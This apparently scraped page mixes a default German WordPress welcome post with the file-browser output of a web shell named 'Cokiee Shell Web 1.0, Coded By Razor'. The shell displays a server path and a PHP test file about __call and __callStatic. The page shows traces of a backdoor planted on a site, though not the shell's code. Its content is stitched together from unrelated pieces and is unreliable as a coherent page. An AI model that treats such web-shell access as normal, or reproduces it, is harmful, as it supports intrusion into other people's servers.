Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/call_static_002.phpt |
--TEST-- Testing __call and __callstatic with callbacks --FILE-- <?php class Foo { public function __call($a, $b) { print "nonstatic\n"; var_dump($a); } static public function __callStatic($a, $b) { print "static\n"; var_dump($a); } } $a = new Foo; call_user_func(array($a, 'aAa')); call_user_func(array('Foo', 'aAa')); ?> --EXPECTF-- nonstatic string(3) "aAa" static string(3) "aAa"
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare